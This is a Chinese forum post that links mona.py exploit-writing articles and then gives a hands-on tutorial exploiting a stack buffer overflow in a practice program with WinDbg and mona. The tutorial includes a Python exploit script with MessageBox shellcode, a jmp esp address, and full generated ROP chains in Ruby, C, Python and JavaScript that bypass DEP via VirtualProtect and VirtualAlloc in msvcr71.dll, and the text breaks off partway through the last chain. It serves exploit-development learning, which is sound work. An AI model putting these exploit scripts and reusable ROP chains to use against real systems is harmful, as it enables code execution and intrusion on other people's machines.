174.127.195.210/bbs/index.php?,[漏洞exploit工具-mona系列4] mona实战系列
PS:本帖只发布些已有的mona实战的帖子,大部分来自互联网搜索结果,这里只给出链接。
来自corelan团段的 稳定通用的ROP链库,过DEP的同学可以看看
https://www.corelan.be/index.php/security/corelan-ropdb/
很不错的库各种环境下/各种DLL的稳定的ROP。
实战 HeapSpray 之 CVE2012-1889 Exploit 编写
http://www.programlife.net/doc/CVE2012-1889.pdf
PS:只用到了mona的 ROP功能! 不过文章真的不错,适合学习
缓冲区溢出漏洞实战(1)
http://www.cnphp6.com/archives/45077
PS:这个用到了几个mona的技巧,是个简单的栈溢出利用文章,新手可以看看
PCMan FTP Server 2.0.7实例分析
http://www.hack80.com/thread-21688-1-1.html
PS:和上一个一样都是对 PCMan FTP做的测试,不过这个更清晰、明了。
Immunity Debugger-mona插件使用
http://www.hack80.com/thread-21042-1-1.html
PS:对几个mona功能的介绍。
缓冲区漏洞过程学习笔记之FTP
http://bigtang.org/缓冲区漏洞过程学习笔记之FTP
PS:这篇用到了pattern_create/offset 去定位EIP,利用 jmp功能去找到 jmp esp 。
【翻译】利用msvcr71.dll 与mona.py实现通用绕过DEP/ASLR
http://bbs.pediy.com/showthread.php?t=139241&highlight=mona+py
PS:本论坛后恋 翻译的文章,来自corelan的优秀文章,介绍了mona 如何在msvcr71中找到ROP链的过程。
简单的栈溢出利用 with mona
我说明下:简单的利用只是为了mona实战,为了起到抛砖引玉的作用。
目标:1.exe (老师以前给的练手的demo,故意加入了msvcr71.ll,为了是使用rop)
环境:win7 x64
工具: windbg (with mona plus) //还没有工具的同学 http://bbs.pediy.com/showthread.php?t=198170 可以看这里的教程,关于windbg配置mona的
1.exe运行效果图
现在第一个textbox中输入字符串,点击OK按钮,将第一个框的内容复制到第二个框里。其中复制过程中,缓冲区溢出。
0x00 windbg 启动mona
打开windbg ,windbg打开要调试的1.exe.
在底部的命令框中输入 .load pykd.pyd
再输入 !py mona (看看能是否正确的启动mona)
mona正常启动了。(你可以用 !py mona update 更新到最新版的mona)
设置工作目录
!py mona config -set workingfolder c:\logs\%p
1.exe 程序还没正常运行起来,我们先输入 g ,将程序运行起来,好加载我们的 msvcr71.dll ,再暂停下来
输入 !py mona modules 查看加载的模块信息
红线部分标注: 我们的1.exe 和 msvcr71.dll 都没有启用保护特性。
0x01 确定offset (控制EIP的偏移)
首先我们先来定位 控制EIP的offset , 我们用mona的 pattern_create \ pattern_offset功能
首先生成模板使用命令 !py mona pattern_create 300 (生成一个300字节的模板)
0:002> !py mona pattern_create 300
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py pattern_create 300
Creating cyclic pattern of 300 bytes
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
[+] Preparing output file 'pattern.txt'
- Creating working folder c:\logs\1
- Folder created
- (Re)setting logfile c:\logs\1\pattern.txt
Note: don't copy this pattern from the log window, it might be truncated !
It's better to open c:\logs\1\pattern.txt and copy the pattern from the file
g 命令运行1.exe
将字符串拷贝下来粘帖到第一个框中,点击OK
0:002> g
(ea8.c7c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=00000001 ecx=0018f97c edx=00000030 esi=00423b40 edi=0018fe68
eip=33654132 esp=0018f860 ebp=0018f868 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
33654132 ?? ???
windbg断下来了。 注意 EIP的值。 我们将在下面用到这里是 33654132
接下来我们用 patter_offset来确定偏移
使用命令 !py mona pattern_offset 33654132
0:000> !py mona pattern_offset 33654132
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py pattern_offset 33654132
Looking for 2Ae3 in pattern of 500000 bytes
[B] - Pattern 2Ae3 (0x33654132) found in cyclic pattern at position 128[/B]
Looking for 2Ae3 in pattern of 500000 bytes
Looking for 3eA2 in pattern of 500000 bytes
- Pattern 3eA2 not found in cyclic pattern (uppercase)
Looking for 2Ae3 in pattern of 500000 bytes
Looking for 3eA2 in pattern of 500000 bytes
- Pattern 3eA2 not found in cyclic pattern (lowercase)
[+] This mona.py action took 0:00:00.305000
那么我们的偏移就是 128 了 。
0x03验证偏移的正确性
构造 python的exploit脚本
exploit = ""
junk = "A"*[B]128[/B]
eip = "\xcc\xcc\xcc\xcc"
nops = "\x90"*20
shellcode = "\xcc"*40
exploit = junk + eip + nops + shellcode
#写文件
try:
rst= open("crash.txt",'w')
rst.write(exploit)
rst.close()
print "OK"
except:
print "Error"
这个脚本将生成crash.txt文件,其中的内容就是我们的exploit内容了。
内容布局: 先是128个A,接着是控制EIP的 cccccccc ,后面是 nop 和 shellcode .
如果 windbg中断下来EIP为cccccccc,这就证明我们获得偏移是正确的。
(fbc.5d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=00000001 ecx=0018f97c edx=00000030 esi=00423b40 edi=0018fe68
eip=cccccccc esp=0018f860 ebp=0018f868 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
cccccccc ?? ???
此时的EIP确实为 cccccccc 了,证明mona给出的偏移是正确的。
0x04 利用mona查找 jmp esp指针
接下来,我们分析下栈的情况
0:000> dd esp-10 L 40
0018f850 41414141 41414141 41414141 cccccccc
0018f860 90909090 90909090 90909090 90909090
0018f870 90909090 cccccccc cccccccc cccccccc
0018f880 cccccccc cccccccc cccccccc cccccccc
0018f890 cccccccc cccccccc cccccccc 00417e00
0:000> dd esp
0018f860 90909090 90909090 90909090 90909090
0018f870 90909090 cccccccc cccccccc cccccccc
0018f880 cccccccc cccccccc cccccccc cccccccc
0018f890 cccccccc cccccccc cccccccc 00417e00
0018f8a0 00000001 00000000 00000000 00000000
0018f8b0 00000001 0018fe68 00000000 0018f90c
0018f8c0 0041a440 00000001 00000000 00000000
0018f8d0 00000000 0018fe68 0018fe68 00000111
可以看到 nops 和 shellcode就在esp指向的栈中,典型的jmp esp案例。
我们来找到jmp esp
!py mona jmp -r esp -cpb "\x00"
0:000> !py mona jmp -r esp -cpb "\x00" //(这条命令的意思,查找 jmp esp ,排除含有有 00 地址 (00 截断字符串))
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py jmp -r esp -cpb \x00
---------- Mona command started on 2015-03-01 15:55:46 (v2.0, rev 554) ----------
[+] Processing arguments and criteria
- Pointer access level : X
- Bad char filter will be applied to pointers : \x00
[+] Generating module info table, hang on...
- Processing modules
- Done. Let's rock 'n roll.
[+] Querying 2 modules
- Querying module 1.exe
^ Memory access error in '!py mona jmp -r esp -cpb "\x00" '
** Unable to process searchPattern 'mov eax,esp # jmp eax'. **
- Querying module msvcr71.dll
^ Memory access error in '!py mona jmp -r esp -cpb "\x00" '
** Unable to process searchPattern 'mov eax,esp # jmp eax'. **
- Search complete, processing results
[+] Preparing output file 'jmp.txt'
- (Re)setting logfile c:\logs\1\jmp.txt
[+] Writing results to c:\logs\1\jmp.txt
- Number of pointers of type 'push esp # ret ' : 1
[+] Results :
0x7c345c30 | 0x7c345c30 : push esp # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [msvcr71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.3052.4 (C:\Users\old7\Desktop\test\New folder\msvcr71.dll)
Found a total of 1 pointers
[+] This mona.py action took 0:00:00.351000
找到一条0x7c345c30 | 0x7c345c30 : push esp # ret
0x05 来组织我们的最后的exploit
import struct
def little_endian(address):
return struct.pack("
exploit = ""
junk = "A"*128
eip = little_endian(0x7c345c30) #0x7c345c30 jmp esp
nops = "\x90"*20
# messagebox 113bit
shellcode = ""
shellcode +="\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
shellcode +="\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
shellcode +="\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
shellcode +="\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
shellcode +="\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
shellcode +="\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
shellcode +="\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
shellcode +="\x49\x0b\x31\xc0\x51\x50\xff\xd7"
exploit = junk + eip + nops + shellcode
#写文件
try:
rst= open("crash.txt",'w')
rst.write(exploit)
rst.close()
print "OK"
except:
print "Error"
效果图 :
接下来我们利用rop在来一次
0x06 rop链的生成
直接使用 mona 的rop 命令,
!py mona rop -m "msvcr71.dll" -cpb "\x00"
这个命令告诉 mona在msvcr71.dll的空间中找rop链,并且不要出现0x00 ,因为会截断字符串。
稍等片刻!
0:001> !py mona rop -m "msvcr71.dll" -cpb "\x00"
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py rop -m msvcr71.dll -cpb \x00
---------- Mona command started on 2015-03-01 16:07:49 (v2.0, rev 554) ----------
[+] Processing arguments and criteria
- Pointer access level : X
- Only querying modules msvcr71.dll
- Bad char filter will be applied to pointers : \x00
[+] Generating module info table, hang on...
- Processing modules
- Done. Let's rock 'n roll.
[+] Preparing output file '_rop_progress_1.exe_3236.log'
- (Re)setting logfile c:\logs\1\_rop_progress_1.exe_3236.log
[+] Progress will be written to _rop_progress_1.exe_3236.log
[+] Maximum offset : 40
[+] (Minimum/optional maximum) stackpivot distance : 8
[+] Max nr of instructions : 6
[+] Split output into module rop files ? False
[+] Enumerating 22 endings in 1 module(s)...
- Querying module msvcr71.dll
- Search complete :
Ending : RETN 0x0C, Nr found : 2
Ending : RETN, Nr found : 2408
Ending : RETN 0x08, Nr found : 24
Ending : RETN 0x02, Nr found : 2
Ending : RETN 0x10, Nr found : 11
Ending : RETN 0x00, Nr found : 12
Ending : RETN 0x06, Nr found : 1
Ending : RETN 0x14, Nr found : 2
Ending : RETN 0x04, Nr found : 62
- Filtering and mutating 2524 gadgets
- Progress update : 500 / 2524 items processed (Sun 2015/03/01 04:07:56 PM) - (19%)
- Progress update : 1000 / 2524 items processed (Sun 2015/03/01 04:08:03 PM) - (39%)
- Progress update : 1500 / 2524 items processed (Sun 2015/03/01 04:08:10 PM) - (59%)
- Progress update : 2000 / 2524 items processed (Sun 2015/03/01 04:08:17 PM) - (79%)
- Progress update : 2500 / 2524 items processed (Sun 2015/03/01 04:08:24 PM) - (99%)
- Progress update : 2524 / 2524 items processed (Sun 2015/03/01 04:08:25 PM) - (100%)
[+] Creating suggestions list
[+] Processing suggestions
[+] Launching ROP generator
[+] Attempting to produce rop chain for VirtualProtect
Step 1/7: esi
[+] Searching from 0x7c340000 to 0x7c396000
Step 2/7: ebp
Step 3/7: ebx
Step 4/7: edx
Step 5/7: ecx
Step 6/7: edi
Step 7/7: eax
[+] Preparing output file 'msvcr71_virtualprotect.xml'
- (Re)setting logfile c:\logs\1\msvcr71_virtualprotect.xml
[+] Attempting to produce rop chain for VirtualAlloc
Step 1/7: esi
[+] Searching from 0x7c340000 to 0x7c396000
Step 2/7: ebp
Step 3/7: ebx
Step 4/7: edx
Step 5/7: ecx
Step 6/7: edi
Step 7/7: eax
[+] Preparing output file 'msvcr71_virtualalloc.xml'
- (Re)setting logfile c:\logs\1\msvcr71_virtualalloc.xml
[+] Preparing output file 'rop_chains.txt'
- (Re)setting logfile c:\logs\1\rop_chains.txt
[+] ROP chains written to file c:\logs\1\rop_chains.txt
################################################################################
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = tr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
----------------------------------------------------------
*** [ Ruby ] ***
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x7c375928, # POP EBP # RETN [msvcr71.dll]
0x7c375928, # skip 4 bytes [msvcr71.dll]
0x7c348495, # POP EAX # RETN [msvcr71.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x7c34d749, # NEG EAX # RETN [msvcr71.dll]
0x7c373ebf, # POP EBX # RETN [msvcr71.dll]
0xffffffff, #
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c35218e, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c36345b, # POP ECX # RETN [msvcr71.dll]
0x7c38baf2, # &Writable location [msvcr71.dll]
0x7c342953, # POP EDI # RETN [msvcr71.dll]
0x7c34d202, # RETN (ROP NOP) [msvcr71.dll]
0x7c34adf5, # POP ESI # RETN [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0x7c3647cc, # POP EAX # RETN [msvcr71.dll]
0x7c37a140, # ptr to &VirtualProtect() [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
rop_chain = create_rop_chain()
*** [ C ] ***
#define CREATE_ROP_CHAIN(name, ...) \
int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
unsigned int name[name##_length / sizeof(unsigned int)]; \
create_rop_chain(name, ##__VA_ARGS__);
int create_rop_chain(unsigned int *buf, unsigned int )
{
// rop chain generated with mona.py - www.corelan.be
unsigned int rop_gadgets[] = {
0x7c375928, // POP EBP // RETN [msvcr71.dll]
0x7c375928, // skip 4 bytes [msvcr71.dll]
0x7c348495, // POP EAX // RETN [msvcr71.dll]
0xfffffdff, // Value to negate, will become 0x00000201
0x7c34d749, // NEG EAX // RETN [msvcr71.dll]
0x7c373ebf, // POP EBX // RETN [msvcr71.dll]
0xffffffff, //
0x7c345255, // INC EBX // FPATAN // RETN [msvcr71.dll]
0x7c35218e, // ADD EBX,EAX // XOR EAX,EAX // INC EAX // RETN [msvcr71.dll]
0x7c344f87, // POP EDX // RETN [msvcr71.dll]
0xffffffc0, // Value to negate, will become 0x00000040
0x7c351eb1, // NEG EDX // RETN [msvcr71.dll]
0x7c36345b, // POP ECX // RETN [msvcr71.dll]
0x7c38baf2, // &Writable location [msvcr71.dll]
0x7c342953, // POP EDI // RETN [msvcr71.dll]
0x7c34d202, // RETN (ROP NOP) [msvcr71.dll]
0x7c34adf5, // POP ESI // RETN [msvcr71.dll]
0x7c3415a2, // JMP [EAX] [msvcr71.dll]
0x7c3647cc, // POP EAX // RETN [msvcr71.dll]
0x7c37a140, // ptr to &VirtualProtect() [IAT msvcr71.dll]
0x7c378c81, // PUSHAD // ADD AL,0EF // RETN [msvcr71.dll]
0x7c345c30, // ptr to 'push esp // ret ' [msvcr71.dll]
};
if(buf != NULL) {
memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
};
return sizeof(rop_gadgets);
}
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
CREATE_ROP_CHAIN(rop_chain, );
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain, );
*** [ Python ] ***
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x7c375928, # POP EBP # RETN [msvcr71.dll]
0x7c375928, # skip 4 bytes [msvcr71.dll]
0x7c348495, # POP EAX # RETN [msvcr71.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x7c34d749, # NEG EAX # RETN [msvcr71.dll]
0x7c373ebf, # POP EBX # RETN [msvcr71.dll]
0xffffffff, #
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c35218e, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c36345b, # POP ECX # RETN [msvcr71.dll]
0x7c38baf2, # &Writable location [msvcr71.dll]
0x7c342953, # POP EDI # RETN [msvcr71.dll]
0x7c34d202, # RETN (ROP NOP) [msvcr71.dll]
0x7c34adf5, # POP ESI # RETN [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0x7c3647cc, # POP EAX # RETN [msvcr71.dll]
0x7c37a140, # ptr to &VirtualProtect() [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
]
return ''.join(struct.pack('
rop_chain = create_rop_chain()
*** [ JavaScript ] ***
//rop chain generated with mona.py - www.corelan.be
rop_gadgets = unescape(
"%u5928%u7c37" + // 0x7c375928 : ,# POP EBP # RETN [msvcr71.dll]
"%u5928%u7c37" + // 0x7c375928 : ,# skip 4 bytes [msvcr71.dll]
"%u8495%u7c34" + // 0x7c348495 : ,# POP EAX # RETN [msvcr71.dll]
"%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201
"%ud749%u7c34" + // 0x7c34d749 : ,# NEG EAX # RETN [msvcr71.dll]
"%u3ebf%u7c37" + // 0x7c373ebf : ,# POP EBX # RETN [msvcr71.dll]
"%uffff%uffff" + // 0xffffffff : ,#
"%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [msvcr71.dll]
"%u218e%u7c35" + // 0x7c35218e : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
"%u4f87%u7c34" + // 0x7c344f87 : ,# POP EDX # RETN [msvcr71.dll]
"%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040
"%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [msvcr71.dll]
"%u345b%u7c36" + // 0x7c36345b : ,# POP ECX # RETN [msvcr71.dll]
"%ubaf2%u7c38" + // 0x7c38baf2 : ,# &Writable location [msvcr71.dll]
"%u2953%u7c34" + // 0x7c342953 : ,# POP EDI # RETN [msvcr71.dll]
"%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [msvcr71.dll]
"%uadf5%u7c34" + // 0x7c34adf5 : ,# POP ESI # RETN [msvcr71.dll]
"%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [msvcr71.dll]
"%u47cc%u7c36" + // 0x7c3647cc : ,# POP EAX # RETN [msvcr71.dll]
"%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT msvcr71.dll]
"%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
"%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [msvcr71.dll]
""); // :
--------------------------------------------------------------------------------------------------
################################################################################
Register setup for VirtualAlloc() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualAlloc()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualAlloc()
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
--------------------------------------------------------
*** [ Ruby ] ***
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x7c35cea2, # POP EBP # RETN [msvcr71.dll]
0x7c35cea2, # skip 4 bytes [msvcr71.dll]
0x7c3590be, # POP EAX # RETN [msvcr71.dll]
0xffffffff, # Value to negate, will become 0x00000001
0x7c34d749, # NEG EAX # RETN [msvcr71.dll]
0x7c341748, # POP EBX # RETN [msvcr71.dll]
0xffffffff, #
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c35218e, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344160, # POP EDX # RETN [msvcr71.dll]
0xffffefff, # Value to negate, destination value : 0x00001000
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c36e9bf, # DEC EDX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c375c69, # POP ECX # RETN [msvcr71.dll]
0xffffffff, #
0x7c354e83, # INC ECX # AND EAX,8000 # RETN [msvcr71.dll]
0x7c358f2a, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN [msvcr71.dll]
0x41414141, # Filler (compensate)
0x7c34272f, # POP EDI # RETN [msvcr71.dll]
0x7c34d202, # RETN (ROP NOP) [msvcr71.dll]
0x7c362b3e, # POP ESI # RETN [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0x7c37582e, # POP EAX # RETN [msvcr71.dll]
0x7c37a094, # ptr to &VirtualAlloc() [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
].flatten.pack("V*")
return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
rop_chain = create_rop_chain()
*** [ C ] ***
#define CREATE_ROP_CHAIN(name, ...) \
int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
unsigned int name[name##_length / sizeof(unsigned int)]; \
create_rop_chain(name, ##__VA_ARGS__);
int create_rop_chain(unsigned int *buf, unsigned int )
{
// rop chain generated with mona.py - www.corelan.be
unsigned int rop_gadgets[] = {
0x7c35cea2, // POP EBP // RETN [msvcr71.dll]
0x7c35cea2, // skip 4 bytes [msvcr71.dll]
0x7c3590be, // POP EAX // RETN [msvcr71.dll]
0xffffffff, // Value to negate, will become 0x00000001
0x7c34d749, // NEG EAX // RETN [msvcr71.dll]
0x7c341748, // POP EBX // RETN [msvcr71.dll]
0xffffffff, //
0x7c345255, // INC EBX // FPATAN // RETN [msvcr71.dll]
0x7c35218e, // ADD EBX,EAX // XOR EAX,EAX // INC EAX // RETN [msvcr71.dll]
0x7c344160, // POP EDX // RETN [msvcr71.dll]
0xffffefff, // Value to negate, destination value : 0x00001000
0x7c351eb1, // NEG EDX // RETN [msvcr71.dll]
0x7c36e9bf, // DEC EDX // XOR EAX,EAX // INC EAX // RETN [msvcr71.dll]
0x7c344f87, // POP EDX // RETN [msvcr71.dll]
0xffffffc0, // Value to negate, will become 0x00000040
0x7c351eb1, // NEG EDX // RETN [msvcr71.dll]
0x7c375c69, // POP ECX // RETN [msvcr71.dll]
0xffffffff, //
0x7c354e83, // INC ECX // AND EAX,8000 // RETN [msvcr71.dll]
0x7c358f2a, // ADD ECX,EDX // ADD EAX,ECX // POP ESI // RETN [msvcr71.dll]
0x41414141, // Filler (compensate)
0x7c34272f, // POP EDI // RETN [msvcr71.dll]
0x7c34d202, // RETN (ROP NOP) [msvcr71.dll]
0x7c362b3e, // POP ESI // RETN [msvcr71.dll]
0x7c3415a2, // JMP [EAX] [msvcr71.dll]
0x7c37582e, // POP EAX // RETN [msvcr71.dll]
0x7c37a094, // ptr to &VirtualAlloc() [IAT msvcr71.dll]
0x7c378c81, // PUSHAD // ADD AL,0EF // RETN [msvcr71.dll]
0x7c345c30, // ptr to 'push esp // ret ' [msvcr71.dll]
};
if(buf != NULL) {
memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
};
return sizeof(rop_gadgets);
}
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
CREATE_ROP_CHAIN(rop_chain, );
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain, );
*** [ Python ] ***
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x7c35cea2, # POP EBP # RETN [msvcr71.dll]
0x7c35cea2, # skip 4 bytes [msvcr71.dll]
0x7c3590be, # POP EAX # RETN [msvcr71.dll]
0xffffffff, # Value to negate, will become 0x00000001
0x7c34d749, # NEG EAX # RETN [msvcr71.dll]
0x7c341748, # POP EBX # RETN [msvcr71.dll]
0xffffffff, #
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c35218e, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344160, # POP EDX # RETN [msvcr71.dll]
0xffffefff, # Value to negate, destination value : 0x00001000
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c36e9bf, # DEC EDX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c375c69, # POP ECX # RETN [msvcr71.dll]
0xffffffff, #
0x7c354e83, # INC ECX # AND EAX,8000 # RETN [msvcr71.dll]
0x7c358f2a, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN [msvcr71.dll]
0x41414141, # Filler (compensate)
0x7c34272f, # POP EDI # RETN [msvcr71.dll]
0x7c34d202, # RETN (ROP NOP) [msvcr71.dll]
0x7c362b3e, # POP ESI # RETN [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0x7c37582e, # POP EAX # RETN [msvcr71.dll]
0x7c37a094, # ptr to &VirtualAlloc() [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
]
return ''.join(struct.pack('
rop_chain = create_rop_chain()
*** [ JavaScript ] ***
//rop chain generated with mona.py - www.corelan.be
rop_gadgets = unescape(
"%ucea2%u7c35" + // 0x7c35cea2 : ,# POP EBP # RETN [msvcr71.dll]
"%ucea2%u7c35" + // 0x7c35cea2 : ,# skip 4 bytes [msvcr71.dll]
"%u90be%u7c35" + // 0x7c3590be : ,# POP EAX # RETN [msvcr71.dll]
"%uffff%uffff" + // 0xffffffff : ,# Value to negate, will become 0x00000001
"%ud749%u7c34" + // 0x7c34d749 : ,# NEG EAX # RETN [msvcr71.dll]
"%u1748%u7c34" + // 0x7c341748 : ,# POP EBX # RETN [msvcr71.dll]
"%uffff%uffff" + // 0xffffffff : ,#
"%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [msvcr71.dll]
"%u218e%u7c35" + // 0x7c35218e : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
"%u4160%u7c34" + // 0x7c344160 : ,# POP EDX # RETN [msvcr71.dll]
"%uefff%uffff" + // 0xffffefff : ,# Value to negate, destination value : 0x00001000
"%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [msvcr71.dll]
"%ue9bf%u7c36" + // 0x7c36e9bf : ,# DEC EDX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
"%u4f87%u7c34" + // 0x7c344f87 : ,# POP EDX # RETN [msvcr71.dll]
"%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040
"%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [msvcr71.dll]
"%u5c69%u7c37" + // 0x7c375c69 : ,# POP ECX # RETN [msvcr71.dll]
"%uffff%uffff" + // 0xffffffff : ,#
"%u4e83%u7c35" + // 0x7c354e83 : ,# INC ECX # AND EAX,8000 # RETN [msvcr71.dll]
"%u8f2a%u7c35" + // 0x7c358f2a : ,# ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN [msvcr71.dll]
"%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
